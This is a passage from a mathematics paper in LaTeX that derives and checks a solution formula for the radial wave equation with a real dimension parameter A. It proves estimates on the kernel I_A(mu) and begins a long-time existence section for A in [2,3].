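1-\mu=\frac{(t+r-\rho)(t-r+\rho)}{2r\rho}.
\end{Eq*}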
By \Le{Le:I_p} below, the $\int_0^{t+r}$ in the formula of $u_g$ and $u_f$ in \Le{Le:u_e} can be replaced by $\int_{\max\{0,r-t\}}^{t+r}$, and $\int_0^{t-s+r}$ in $u_F$ can be replaced by $\int_{\max\{0,r+s-t\}}^{t-s+r}$ .
\end{remark}
To show \Le{Le:u_e}, we need to explore some properties of $I_A(\mu)$.
\begin{lemma}\label{Le:I_p}
For $A>1$ and $I_A(\mu)$ defined in \Le{Le:u_e}, we have
\begin{Eq}
I_A(1-)=\frac{1}{2},\qquad I_A(\mu)=0 \text{ for } \mu>1.\label{Eq:I_p_1}
\end{Eq}
Moreover,
for $A\not\in 1+2{\mathbb{Z}}_+$ with some constants $C_0$ and $C_{1}$ depending on $A$,
we have
\begin{alignat}{2}
|\partial_{\mu}^mI_A(\mu)|\lesssim&(1-\mu)^{\frac{1-A}{2}-m}, &\qquad& \mu\leq -2,m=0,1;\label{Eq:I_p_2}\\
I_A(\mu)=&C_0\ln|1+\mu|+O(1),&\qquad& -2<\mu<1;\label{Eq:I_p_3}\\
\partial_\mu I_A(\mu)= &C_1(1+\mu)^{-1}+O\kl(|\ln|1+\mu||+1\kr),&\qquad& -2<\mu<1.\label{Eq:I_p_4}
\end{alignat}
On the other hand, for $A\in 1+2{\mathbb{Z}}_+$,
we have
\begin{alignat}{2}
I_A(\mu)=&0,&\qquad &\mu<-1;\label{Eq:I_p_5}\\
|\partial_\mu^{m}I_A(\mu)|\lesssim& 1,&\qquad &-1<\mu<1,~m=0,1.\label{Eq:I_p_6}
\end{alignat}
\end{lemma}
\subsection{Proof of \Le{Le:u_e}}\label{Pf_u_e}
Here we only prove the formula for $u_g$ with $f=F=0$; the other formulas can be obtained by a direct calculation and \emph{Duhamel}'s principle. Without loss of generality we only deal with the case $A\not\in {\mathbb{Z}}_+$.
\setcounter{part0}{0}
\value{parta}[Alternative expression of $u_g$]
Before the proof, we give an alternative expression of the $u_g$ constructed in \Le{Le:u_e}.
We first introduce a change of variables
\begin{Eq*}
&(\rho,\lambda)=\kl(\sqrt{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda},~\frac{r-\tilde \rho\tilde\lambda}{\sqrt{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda}}\kr)\\
\Leftrightarrow&(\tilde\rho,\tilde\lambda)=\kl(\sqrt{r^2+ \rho^2-2r \rho\lambda},~\frac{r- \rho\lambda}{\sqrt{r^2+ \rho^2-2r \rho\lambda}}\kr).
\end{Eq*}
A direct calculation shows that the map $(\rho,\lambda)\mapsto(\tilde\rho,\tilde\lambda)$ satisfies the relation
\begin{Eq*}
\kl|\frac{\d(\rho,\lambda)}{\d(\tilde\rho,\tilde\lambda)}\kr|=\frac{\tilde\rho^2}{r^2+\tilde \rho^2-2r\tilde \rho\tilde\lambda}=\frac{\tilde\rho^2}{\rho^2},\qquad \rho^2(1-\lambda^2)=\tilde\rho^2(1-\tilde\lambda^2),
\end{Eq*}
and is a bijection from $(0,\infty)\times(-1,1)$ to itself.
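Indeed, the second relation can be verified directly: since $\tilde\lambda\tilde\rho=r-\rho\lambda$, we have
\begin{Eq*}
\tilde\rho^2(1-\tilde\lambda^2)=\tilde\rho^2-(r-\rho\lambda)^2
=\kl(r^2+\rho^2-2r\rho\lambda\kr)-\kl(r^2-2r\rho\lambda+\rho^2\lambda^2\kr)=\rho^2(1-\lambda^2).
\end{Eq*}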
For $A=1+2k+2\theta$ with $k\in {\mathbb{N}}_0$ and $\theta\in(0,1)$, we substitute $I_A(\mu)$ into $u_g$.
Noticing $\mathcal{X}_+^{\alpha}$ is a homogeneous distribution of degree $\alpha$, we find
\begin{Eq*}
u_g=&\frac{1}{\Gamma\kl(\frac{A-1}{2}\kr)} \int_{0}^{\infty}\int_{-1}^{1} g(\rho)\mathcal{X}_+^{\frac{1-A}{2}}\kl(t^2-r^2-\rho^2+2r\rho\lambda\kr)\rho^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\rho.\\
=&\frac{1}{\Gamma\kl(k+\theta\kr)} \int_{0}^{\infty}\int_{-1}^{1} g\kl(\sqrt{r^2+\tilde\rho^2-2r\tilde\rho\tilde\lambda}\kr)\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)} \int_{0}^{\infty}\int_{-1}^{1}}
\times\mathcal{X}_+^{-k-\theta}\kl(t^2-\tilde\rho^2\kr)\tilde\rho^{A-1}\sqrt{1-\tilde\lambda^2}^{A-3}\d \tilde\lambda\d\tilde\rho\\
=&\frac{1}{\Gamma\kl(k+\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\int_{0}^{\infty}\int_{-1}^{1} g\kl(\sqrt{r^2+\tilde\rho^2-2r\tilde\rho\tilde\lambda}\kr)\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\int_{0}^{\infty}\int_{-1}^{1}}
\times\mathcal{X}_+^{-\theta}\kl(t^2-\tilde\rho^2\kr)\tilde\rho^{A-1}\sqrt{1-\tilde\lambda^2}^{A-3}\d \tilde\lambda\d\tilde\rho.
\end{Eq*}
Set $\tilde\rho=t\sigma$ and $\tilde\lambda=\lambda$. Recalling the definition of $\mathcal{X}_+^{-\theta}$, we finally reach
\begin{Eq}\label{Eq:u_g_c}
u_g=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\Bigg(t^{1+2k}\int_{0}^{1}\int_{-1}^{1} \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^k\Bigg(t^{1+2k}\int_{0}^{1}\int_{-1}^{1}}\times\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\Bigg).
\end{Eq}
\value{parta}[Differentiability, boundary requirement and initial requirement]
Now we begin the proof.
Firstly, using the expression just obtained,
we can easily check that $u\in C^2({\mathbb{R}}_+^2)$ provided $g\in C_0^\infty((0,\infty))$.
We can also calculate that
\begin{Eq*}
\partial_ru=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)} \kl(\frac{\partial_t}{2t}\kr)^kt^{1+2k}\int_{0}^{1}\int_{-1}^{1}\frac{r-t\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\\
&\phantom{\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)} \kl(\frac{\partial_t}{2t}\kr)^kt^{1+2k}\int_{0}^{1}\int_{-1}^{1}}
\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Let $r=0$.
Since the integrand is an odd function of $\lambda$,
such $u$ satisfies the boundary requirement.
To check the initial conditions we temporarily use the original expression in \Le{Le:u_e}.
Using \Le{Le:I_p} we know $I_A(\mu)=0$ when $\mu>1$, which happens when $\rho<r-t$ with $r>t$.
Then for any $r>t>0$, we have
\begin{Eq*}
u(t,r)=&r^{\frac{1-A}{2}} \int_{r-t}^{t+r}\rho^{\frac{A-1}{2}}g(\rho) I_A\kl(\mu\kr) \d \rho\\
u_t(t,r)=&r^{\frac{1-A}{2}}\kl((t+r)^{\frac{A-1}{2}}g(t+r)+(r-t)^{\frac{A-1}{2}}g(r-t)\kr)I_A(1-)\\
&+r^{\frac{1-A}{2}} \int_{r-t}^{t+r}\rho^{\frac{A-1}{2}}g(\rho) \frac{-t}{r\rho}I_A'\kl(\mu\kr) \d \rho.
\end{Eq*}
Letting $t\rightarrow 0$
and using \Le{Le:I_p} again,
we find $u(0,r)=0$ and $u_t(0,r)=g(r)$.
\value{parta}[Differential equation requirement]
Finally,
we need to check that $u$ satisfies \eqref{Eq:u_l}.
By a calculation trick
\begin{Eq*}
\partial_t^2 \kl(\frac{\partial_t}{t}\kr)^{k}t^{1+2k}=\kl(\frac{\partial_t}{t}\kr)^{k+1}t^{2k+2}\partial_t,
\end{Eq*}
(see e.g. \cite[Lemma 2 in Section 2.4]{MR2597943}) we calculate that
\begin{Eq*}
\partial_t^2 u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_1\kr),\\
w_1:=&\int_{0}^{1}\int_{-1}^{1}\frac{t\sigma^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
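As a sanity check on the calculation trick above, when $k=0$ it reads, for a smooth function $w(t)$,
\begin{Eq*}
\partial_t^2(tw)=tw''+2w'=\frac{1}{t}\partial_t\kl(t^2w'\kr),
\end{Eq*}
which is exactly the claimed identity.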
On the other hand, a process similar to the one that led to \eqref{Eq:u_g_c} also shows
\begin{Eq*}
u=&\frac{1}{\Gamma\kl(k+\theta\kr)\Gamma\kl(2-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2} \tilde w_2\kr),\\
\tilde w_2:=&t\int_{0}^{1}\int_{-1}^{1} \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Then, we see
\begin{Eq*}
\partial_r\tilde w_2=&t\int_{0}^{1}\int_{-1}^{1}\frac{r-t\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
=&-\int_{0}^{1}\int_{-1}^{1}\frac{\partial_\lambda g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-2}\sqrt{1-\lambda^2}^{A-1}\d \lambda\d\sigma\\
&-\int_{0}^{1}\int_{-1}^{1}\lambda \frac{\partial_\sigma g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta-1}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Using integration by parts, we get
\begin{Eq*}
\partial_r\tilde w_2=&-2(1-\theta)\int_{0}^{1}\int_{-1}^{1}\lambda \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Thus we have
\begin{Eq*}
\partial_r u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_2\kr)\\
w_2:=&-\int_{0}^{1}\int_{-1}^{1}\lambda \frac{g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Taking the derivative again, we also have
\begin{Eq*}
\partial_r^2 u=&\frac{2}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}w_3\kr)\\
w_3:=&\int_{0}^{1}\int_{-1}^{1}\frac{t\sigma^2\lambda^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}} \frac{g'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\theta}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma.
\end{Eq*}
Gluing $\partial_t^2u$, $\partial_r^2 u$ and $\partial_r u$ together, we finally calculate
\begin{Eq*}
&(\partial_t^2-\partial_r^2-(A-1)r^{-1}\partial_r)u\\
=&\frac{2r^{-1}}{\Gamma\kl(k+\theta\kr)\Gamma\kl(1-\theta\kr)} \kl(\frac{\partial_t}{2t}\kr)^{k+1}\kl(t^{2k+2}\kl(rw_1-rw_3-(A-1)w_2\kr)\kr)
\end{Eq*}
where
\begin{Eq*}
rw_1-rw_3=&-\int_{0}^{1}\int_{-1}^{1}\frac{\partial_\lambda g\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^\theta}\sigma^{A}\sqrt{1-\lambda^2}^{A-1}\d \lambda\d\sigma\\
=&(A-1)w_2.
\end{Eq*}
This finishes the proof.
\subsection{Proof of \Le{Le:I_p}}
We begin with the second half of \eqref{Eq:I_p_1},
which is trivial since $\mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)=0$ for $\lambda\in[-1,1]$ and $\mu>1$.
For the other results, we need to divide $A$ into two cases.
\setcounter{part0}{0}
\value{parta}[$A$ is not odd]
We begin with the case that $A$ is not odd, i.e. $A=1+2k+2\theta$ with $k\in {\mathbb{N}}_0$ and $0<\theta<1$.
By definition we see that when $\mu\leq -2$ and $\lambda\in[-1,1]$, we have
\begin{Eq*}
\partial_\mu^m \mathcal{X}_+^{\frac{1-A}{2}}\kl(\lambda-\mu\kr)\approx (1-\mu)^{\frac{1-A}{2}-m},
\end{Eq*}
which gives \eqref{Eq:I_p_2}. When $-1<\mu<1$, $I_A$ has the formula
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)} \int_{-1}^{1} \partial_\lambda^k\mathcal{X}_+^{-\theta}\kl(\lambda-\mu\kr)(1-\lambda^2)^{k+\theta-1}\d \lambda\\
=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)}\int_{-1}^{1} \mathcal{X}_+^{-\theta}\kl(\lambda-\mu\kr)(-\partial_\lambda)^k(1-\lambda^2)^{k+\theta-1}\d \lambda\\
=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)}\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\sum_{j=0}^{\lfloor k/2\rfloor }C_{j,k,\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda
\end{Eq*}
with some constants $C_{j,k,\theta}$. Here $\lfloor a\rfloor$ stands for the integer part of $a$.
\subpart[$\mu$ close to $1-$]
Firstly we let $\mu$ close to $1-$. Introducing $\lambda=(1-\mu)\sigma+\mu$, we have
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&(1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma.
\end{Eq*}
Let $\mu\rightarrow 1-$. Using the dominated convergence theorem, we find the limit is nonzero only if $j=0$, where
\begin{Eq*}
&\lim_{\mu\rightarrow 1-}\int_0^1 \sigma^{-\theta}(1-\sigma)^{\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k}\kl(\sigma+\mu-\mu\sigma+1\kr)^{\theta-1}\d\sigma\\
=&2^{\theta-1}\int_0^1 \sigma^{-\theta}(1-\sigma)^{\theta-1}\d\sigma.
\end{Eq*}
Now, we calculate
\begin{Eq*}
C_{0,k,\theta}=\begin{cases}
1,&k=0;\\
2^k(k+\theta-1)(k+\theta-2)\cdots \theta,&k>0,
\end{cases}
\end{Eq*}
then
\begin{Eq*}
\lim_{\mu\rightarrow 1-}I_A(\mu)=&\frac{1}{2\Gamma\kl(\theta\kr)\Gamma(1-\theta)}\int_{0}^{1} \sigma^{-\theta}(1-\sigma)^{\theta-1}\d \sigma=\frac{1}{2},
\end{Eq*}
where we used the Beta integral $\int_{0}^{1} \sigma^{-\theta}(1-\sigma)^{\theta-1}\d \sigma=B(1-\theta,\theta)=\Gamma(\theta)\Gamma(1-\theta)$.
This finishes the first half of \eqref{Eq:I_p_1} for non-odd $A$.
For the derivative, we calculate
\begin{Eq*}
&\partial_\mu\kl((1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\kr)\\
=&j(1-\mu)^{j-1}\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta-1}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\\
&+(k-2j)(1-\mu)^j\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j-1}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-1}\d\sigma\\
&+(j+\theta-1)\int_0^1 \sigma^{-\theta}(1-\sigma)^{j+\theta}\kl(\sigma+\mu-\mu\sigma\kr)^{k-2j}\kl(\sigma+\mu-\mu\sigma+1\kr)^{j+\theta-2}\d\sigma,
\end{Eq*}
with no singularity in any of these integrals. This means $\partial_\mu I_A(\mu)=O(1)$ for $\mu$ close to $1-$, which is consistent with \eqref{Eq:I_p_4}.
\subpart[$\mu$ close to $-1+$]
Next we let $\mu$ be close to $-1+$; without loss of generality we assume $\mu<-1/2$. Then
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda+\int_{0}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda+O(1),
\end{Eq*}
where $h(\lambda):=\lambda^{k-2j}(1-\lambda)^{j+\theta-1}$ satisfies $h\in C^\infty([-1,0])$. For the first integral, we split it as
\begin{Eq*}
&\int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}(h(\lambda)-h(-1))\d \lambda
+h(-1)\int_{\mu}^{0} (1+\lambda)^{j-1}\d \lambda\\
&+h(-1)\kl(\int_{\mu}^{1+2\mu}+\int_{1+2\mu}^0\kr) \kl((\lambda-\mu)^{-\theta}-(1+\lambda)^{-\theta}\kr)(1+\lambda)^{j+\theta-1}\d \lambda\\
\equiv& J_1+J_2+J_3+J_4.
\end{Eq*}
Using the mean value theorem, it is easy to find that
\begin{Eq*}
|J_1|\lesssim& \int_{\mu}^{0} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta}\d \lambda \lesssim 1,\\
J_2=&C_j\ln(1+\mu)+O(1),\\
|J_3|\lesssim& (1+\mu)^{j+\theta-1}\int_{\mu}^{1+2\mu} (\lambda-\mu)^{-\theta}-(1+\lambda)^{-\theta}\d \lambda\lesssim (1+\mu)^j\lesssim 1,\\
|J_4|\lesssim&(1+\mu)\int_{1+2\mu}^{0}(1+\lambda)^{j-2}\d \lambda\lesssim 1.
\end{Eq*}
Adding these together, we find
\begin{Eq*}
\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda
=& C_j\ln(1+\mu)+O(1),
\end{Eq*}
which gives \eqref{Eq:I_p_3} for $-1<\mu$.
As for the derivative, we introduce the change of variable $\lambda=\sigma(1+\mu)-1$, then
\begin{Eq*}
&\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&(1+\mu)^{j}\int_{1}^{(1+\mu)^{-1}} (\sigma-1)^{-\theta}\sigma^{j+\theta-1}h(\sigma(1+\mu)-1)\d \sigma\\
&+\int_{0}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda.
\end{Eq*}
Taking the derivative and splitting it similarly as above, we also find
\begin{Eq*}
\partial_\mu\int_{\mu}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda=C_j'(1+\mu)^{-1}+O\kl(|\ln(1+\mu)|+1\kr),
\end{Eq*}
which gives \eqref{Eq:I_p_4} for $-1<\mu$.
\subpart[$\mu$ close to $-1-$]
To get the other part of \eqref{Eq:I_p_3}, we only need to control $I_A(\mu)-I_A(-2-\mu)$ for $-3/2< \mu<-1$. Here, for $-2\leq \mu<-1$, $I_A$ has the formula
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k-\theta}}{\Gamma\kl(k+\theta\kr)\Gamma(1-\theta)}\int_{-1}^{1} (\lambda-\mu)^{-\theta}\sum_{j=0}^{\lfloor k/2 \rfloor}C_{j,k,\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda.
\end{Eq*}
Thus, to show \eqref{Eq:I_p_3}, we only need to estimate
\begin{Eq*}
&\int_{-1}^{1} (\lambda-\mu)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda-\int_{-\mu-2}^{1} (\lambda+\mu+2)^{-\theta}\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
=&\int_{-1}^{-\mu-2} (\lambda-\mu)^{-\theta}(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda\\
&+\kl(\int_{-\mu-2}^{-2\mu-3}+\int_{-2\mu-3}^{0}\kr) \kl((\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\kr)(1+\lambda)^{j+\theta-1}h(\lambda)\d \lambda\\
&+\int_{0}^{1} \kl((\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\kr)\lambda^{k-2j}(1-\lambda^2)^{j+\theta-1}\d \lambda\\
\equiv& J_1+J_2+J_3+J_4.
\end{Eq*}
Here we have
\begin{Eq*}
|J_1|\lesssim &(-1-\mu)^{-\theta}\int_{-1}^{-\mu-2} (1+\lambda)^{j+\theta-1}|h(\lambda)|\d \lambda\lesssim 1,\\
|J_2|\lesssim &(-1-\mu)^{j+\theta-1}\int_{-\mu-2}^{-2\mu-3}(\lambda-\mu)^{-\theta}-(\lambda+\mu+2)^{-\theta}\d\lambda\lesssim(-1-\mu)^j\lesssim 1,\\
|J_3|\lesssim &(-1-\mu)\int_{-2\mu-3}^{0}(1+\lambda)^{j-2}\d\lambda\lesssim 1,\\
|J_4|\lesssim &\int_{0}^{1}(1-\lambda)^{j+\theta-1}\d\lambda\lesssim 1.\\
\end{Eq*}
In summary, we finish the proof of \eqref{Eq:I_p_3}.
As for the derivative, we introduce the change of variable $\lambda=\mu-\sigma(1-\mu)$ for $J_2$.
By a similar approach as above, we find $|\partial_\mu(J_1+J_2+J_3+J_4)|\lesssim |\ln|1+\mu||+1$.
This finishes the proof of \eqref{Eq:I_p_4}.
\value{parta}[$A$ is odd]
Next, we consider the case $A=1+2k$ with $k\in {\mathbb{Z}}_+$. In this case we have
\begin{Eq*}
\supp \mathcal{X}_+^{\frac{1-A}{2}}\kl(x\kr)=\supp \delta^{(k-1)}\kl(x\kr)=\{0\},
\end{Eq*}
which gives \eqref{Eq:I_p_5}. On the other hand, when $-1<\mu<1$, we have
\begin{Eq*}
I_A(\mu)=&\frac{2^{-k}}{\Gamma\kl(k\kr)} \int_{-1}^{1} \partial_\lambda^{k-1}\delta\kl(\lambda-\mu\kr)(1-\lambda^2)^{k-1}\d \lambda\\
=&\frac{2^{-k}}{\Gamma\kl(k\kr)}\int_{-1}^{1} \delta\kl(\lambda-\mu\kr)(-\partial_\lambda)^{k-1}(1-\lambda^2)^{k-1}\d \lambda\\
=&\frac{2^{-k}}{\Gamma\kl(k\kr)}\sum_{j=0}^{\lfloor (k-1)/2 \rfloor}C_{j,k}'\mu^{k-1-2j}(1-\mu^2)^{j}.
\end{Eq*}
This means there is no singularity in $I_A(\mu)$ or its derivative, which leads to \eqref{Eq:I_p_6}.
Here we also find $C_{0,k}'=2^{k-1}(k-1)!$,
which implies the first half of \eqref{Eq:I_p_1} for odd $A$. This finishes the proof of \Le{Le:I_p}.
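As a consistency check, when $A=3$ (i.e.\ $k=1$) the sum reduces to the single term
\begin{Eq*}
I_3(\mu)=\frac{1}{2},\qquad -1<\mu<1,
\end{Eq*}
so the formula in \Le{Le:u_e} recovers the classical solution $u_g=\frac{1}{2r}\int_{|t-r|}^{t+r}\rho g(\rho)\d \rho$ of the $3$-dimensional radial wave equation.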
\subsection{Additional discussion of weak solutions}
Since the framework we adopt differs slightly from the usual one,
we discuss the weak solution a bit further.
We will show that when
\begin{Eq}\label{Eq:u_i_r}
r^{A-1}f\in L_{loc;r}^1,~r^{A-1}g\in L_{loc;r}^1,~ r^{A-1}F\in L_{loc;t,r}^1,~r^{A-1}u\in L_{loc;t,r}^1
\end{Eq}
with $u$ calculated by \Le{Le:u_e}, then \eqref{Eq:u_i} holds.
To show this result,
we divide $u$ into $u_g$, $u_f$ and $u_F$.
We begin with the $u_g$ part. Noticing that $I_A(\mu)=0$ for $\mu>1$, in this case we have
\begin{Eq*}
&\int_0^T\int_0^\infty u\cdot \kl(\partial_t^2-\Delta_A\kr)\phi r^{A-1}\d r\d t\\
=&\int_0^T\int_0^\infty \int_{0}^\infty r^{\frac{A-1}{2}}\rho ^{\frac{A-1}{2}}g(\rho) I_A\kl(\frac{r^2+\rho^2-t^2}{2r\rho}\kr) \kl(\partial_t^2-\Delta_A\kr)\phi(t,r) \d \rho\d r\d t.
\end{Eq*}
Set $t=T-s$, swap $r$ and $\rho$, then exchange the order of integration. This becomes
\begin{Eq*}
&\int_0^\infty \int_0^T \int_0^\infty r^{\frac{A-1}{2}}\rho ^{\frac{A-1}{2}}g(r) I_A\kl(\frac{r^2+\rho^2-(T-s)^2}{2r\rho}\kr) \kl(\partial_s^2-\Delta_A\kr)\phi(T-s,\rho) \d \rho\d s\d r.
\end{Eq*}
Here $\phi(T-s,\rho)$ has zero initial data at $s=0$ and is regular enough, so by the expression for $u_F$ deduced in \Le{Le:u_e}, we know
\begin{Eq*}
&r^{\frac{1-A}{2}}\int_0^T \int_0^\infty \rho ^{\frac{A-1}{2}} I_A\kl(\frac{r^2+\rho^2-(T-s)^2}{2r\rho}\kr) \kl(\partial_s^2-\Delta_A\kr)\phi(T-s,\rho) \d \rho\d s\\
=&\kl.\phi(T-s,r)\kr|_{s=T}=\phi(0,r).
\end{Eq*}
This gives \eqref{Eq:u_i} with $f=F=0$. The proofs for the $u_f$ and $u_F$ parts are similar; we leave them to the interested reader.
\section{Long-time existence for $A\in[2,3]$}\label{Se:3}
In this section, we consider the case $A\in[2,3]$ and prove \Th{Th:M_1}. Without loss of generality we assume $n\neq A$; otherwise $V=0$ and \eqref{Eq:U_o} reduces to the equation of the \emph{Strauss} conjecture.
By the discussion in the last section, we may instead study the equations \eqref{Eq:u_o} and \eqref{Eq:u_l}.
\subsection{Estimate for homogeneous solution}
In this subsection, we will give an estimate of the homogeneous solution to \eqref{Eq:u_l}.
\begin{lemma}\label{Le:u0_e}
Let $A\in[2,3]$, $n\geq 2$ and assume $\supp(f,g)\subset [0,1)$. We have
\begin{Eq*}
|u_f+u_g|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl(\|\rho g(\rho)\|_{L_\rho^\infty}+\|f(\rho)\|_{L_\rho^\infty}+\|\rho f'(\rho)\|_{L_\rho^\infty}\kr).
\end{Eq*}
Here and throughout the paper, $\kl<a\kr>$ stands for $\sqrt{|a|^2+4}$.
\end{lemma}
\begin{proof}[Proof of \Le{Le:u0_e}]
Here we define
\begin{Eq*}
\Omega_0:=\{\rho:0<\rho<t-r\},\qquad \Omega_1:=\{\rho:|t-r|<\rho<\min(1,t+r)\},
\end{Eq*}
with $\Omega_0=\emptyset$ when $t<r$.
\setcounter{part0}{0}
\value{parta}[Estimate of $u_g$ with $A\in[2,3)$]
First we consider $u_g$ with $A\in[2,3)$. By \Le{Le:u_e} and \eqref{Eq:I_p_1} we have
\begin{Eq*}
u_g(t,r)=&r^{\frac{1-A}{2}}\kl(\int_{\Omega_0}+\int_{\Omega_1}\kr)I_A(\mu)\rho^{\frac{A-1}{2}}g(\rho)\d\rho
\equiv J_{0}+J_{1}.
\end{Eq*}
Also, for $A\in[2,3)$ we have
\begin{Eq*}
|\ln|1+\mu||\lesssim |1+\mu|^{\frac{A-3}{2}}\lesssim |1+\mu|^{\frac{1-A}{2}},\qquad -2<\mu<1.
\end{Eq*}
\subpart[$t+r\leq 4$]
In this part, we have $\kl<t+r\kr>\approx \kl<t-r\kr>\approx 1$ and $r\lesssim 1$.
In the region of $\Omega_0$ where $\mu<-1$,
